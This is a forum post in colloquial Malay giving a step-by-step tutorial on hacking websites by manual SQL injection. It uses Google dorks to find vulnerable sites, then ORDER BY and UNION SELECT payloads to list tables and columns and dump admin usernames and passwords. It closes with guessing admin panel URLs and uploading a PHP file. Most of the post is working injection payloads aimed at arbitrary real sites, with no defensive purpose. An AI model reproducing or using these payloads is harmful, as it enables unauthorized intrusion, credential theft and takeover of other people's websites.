IT Community Malaysia

Members Login

Post Info TOPIC: Lesson 3#- Manually SQL injection (Using Mozilla Firefox and HackBar addon)

Call me if you in trouble

Smasher Hax

Status: Offline

Posts: 267

Date: May 9, 2012

Lesson 3#- Manually SQL injection (Using Mozilla Firefox and HackBar addon)	Permalink

Salam kpd semua... Arini aku nk tutor kan hack website secare manually.. crenye agak berbelit ckit n percent utk jadi agk kurg.. cube r sendiri.. sebelum buat aper2, bukak firefox korg pastu install hackbar dulu.. follow link nih: Tekan Sini okeh?? terbaek.. Step 1: Cari website yang "Vulnerable" Rakan baek sql adalah google. kte boleh mencari website yang boleh di-hack melalui google dengan cara yg mcm nih.. pilih salah 1 dork kt bawah: inurl:index.php?id= inurl:gallery.php?id= inurl:article.php?id= inurl:pageid= Copy and paste kat google.. pastu pilihlah webs yg mne y'all suke.. Klik disini untuk download semua jenis Google Dork ............ Step 2:Periksa sama ada webs itu adalah Vulnerable(Boleh di-hack) atau tidak mudah jer. misal nyer kite dah pilih webs yg vuln yg kte pilih dari google dork td adalh ini: http://www.victimsite.com/index.php?id=2 jadi, cre nyer cume tmbah (') sahaje tanpa jarak dan kurungn dibelakg url td.. contoh nyer: http://www.victimsite.com/index.php?id=2' jika telah tmbh (') tp page yg sme dipaparkan, mknenyer webs tu tidak boleh di-hack.. tp kalu dia paparkan page yang lain misalnyer page error ker or page laen yng berkaitan dengn sql, maka webs tuh vulnerable.. hehe.. ............................... Step 3:Mencari bilangan kolum step ni pon senang lah jugak.. cre nyer cume tambah dibelakag url td dengn nih order by [n] ..... [n] akan ditukar kpd nilai nombor 1,2,3,... ... Contoh: `http://www.victimsite.com/index.php?id=2 order by 1` `http://www.victimsite.com/index.php?id=2 order by 2` `http://www.victimsite.com/index.php?id=2 order by 3` `http://www.victimsite.com/index.php?id=2 order by 4` buat binatang nih dari nombor 1 sampai kepada nombor yg mendapat page error... contoh nyer..: http://www.victimsite.com/index.php?id=2 order by 1(noerror) http://www.victimsite.com/index.php?id=2 order by 2(noerror) http://www.victimsite.com/index.php?id=2 order by 3(noerror) http://www.victimsite.com/index.php?id=2 order by 4(noerror) http://www.victimsite.com/index.php?id=2 order by 5(noerror) http://www.victimsite.com/index.php?id=2 order by 6(noerror) http://www.victimsite.com/index.php?id=2 order by 7(noerror) http://www.victimsite.com/index.php?id=2 order by 8(error) page yg pertama hingga ke 7 adlah mempunyai kolum.. ini bermakne webs ini mempunyai 7 kolum.. kadangkala... tidak semue website boleh terime command order by [n] .... jadi korg boleh cube comand yang nih.. order by [n]-- .... contoh: http://www.victimsite.com/index.php?id=2 order by 1-- ................ Step 4:Mencari kolum yang Vulnerable dalam step ini.. kite akn gunekn command ini union select [no. kolum :1, 2, 3, ..--] dan tukarkan no id= kepada nilai negatif (-).. contoh: http://www.victimsite.com/index.php?id=-2 union select 1,2,3,4,5,6,7-- ada sesetengah webs yg tidak boleh terimenilai id= nilai negatif... dan jika command diatas tidak brfungsi.. cube yg ini: http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,3,4,5,6,7-- ia akan memaparkan seperti berikut: ini bermakna kolum yg vulnerable adalah 3 dan 7.. sebagai contoh aku pilih kolum no. 3... ................... Step 5:Mencari versi, database, user dalam step ini.. kite akn menambah command "version()" ,... apa yg perlu lkukan adalah gunekan semula command step yg ke-4 tetapi tukarkan kolum 3 kepada version()... contoh: http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,version(),4,5,6,7-- ia akan paprkn versi kolumnyer mcm nih: version as 5.0.1 or 4.3. lebih kurg r tuh,.. so, skunk,, aper yg korg kene buat adalah gunekan command yg td jugak.. tp cume tukarkan kepada database() dan user() masing-masing.. contoh: http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,database(),4,5,6,7-- dan http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2, user() ,4,5,6,7-- kalu yang kt ats nih tk brfungsi.. gune yg nih..: http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,unhex(hex(@@version)),4,5,6,7-- ............................ Step 6:Mencari nama tables okeh.. skrg ade skill utk lakukn step nih.. yg pertame kalu versi nyer adalah 5 dan ke atas.. tukar kn nilai kolum 3 kepada ni group_concat(table_name) dan tmbahkan dibelakag url command ni from information_schema.tables where table_schema=database() .... contoh: http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(table_name),4,5,6,7 from information_schema.tables where table_schema=database()-- dan ia akan memaparkan seperti berikut: dan sekrg.. pilih kolum admin.. Jika versi nyer adlah 4 dan kebawah.. korg kene teke sendiri nme table tuh.. n.. part versi 4 ke bawah yg paling aku bosan sekali... haizzz... ..................................... Step 7:Mencari nama kolum sekrg... tukar kn command group_concat(table_name) kepada group_concat(column_name) dan tukarkan from information_schema.tables where table_schema=database() kepada FROM information_schema.columns WHERE table_name=mysqlchar-- ... seterusnyer.. kite kene tukarkn string MySql CHAR() dengn mysqlchar. Cari MysqlChar () untuk Tablename: bukak addon korg.. perge ke sql>Mysql>MysqlChar() nnt akn keluar 1 popup kecil pastu korg cume msok kn jer slh stu nme kolum yg korg jumpe tadi.. aku pilih admin.. klik oke... skunk.. korg akn jumpe CHAR dlm hack toolbar tuh... copy and paste code kt last url.. contoh: http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(column_name),4,5,6,7 from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)-- skrg ia akn paparkn kolum-kolum yg terkndung mcm admin,password,admin_id,admin_name,admin_password,active,id,admin_name,admin_pas s,admin_id,admin_name,admin_password,ID_admin,admin_username,username,password..etc.... skrg temptkn group_concat(column_name) kpd group_concat(name kolum,0x3a,name kolu lain) dan tukarkan from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110) kepada from table_name contohnyer: http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(admin_id,0x3a,admin_password),4,5,6,7 from admin-- kadangkala ia paprkn yg kolum tidak dijumpai.. so korg kene cube kolum yg lain.. tp.. skrg.. ia akn paparkan password dan username sekali... Cheers... Step 8: Mencari admin login dalam step nih.. cre korg nk crik admin login cume kene try 1 per 1 url yg kt bawah nih... http://www.victimsite.com/admin.php http://www.victimsite.com/admin/ http://www.victimsite.com/admin.html http://www.victimsite.com:2082/ yg kt ats nih contoh jer.. kalu nk yang full punyer admin panel url.. download link kt bwh.: Klik Sini seterusnyer korg cume login sebagai admin.. pastu upload lah korg punyer file .php tuh.. CHEERSSSSSs... tq... __________________ I am Sharper ITC - Internet Moderators Mods Name: KA

Page 1 of 1 sorted by

manual sql injection sql injection how to hack website hack webs hack webs wthout software webs hacking

Tweet this page

Post to Digg

Post to Del.icio.us

Create your own FREE Forum
Report Abuse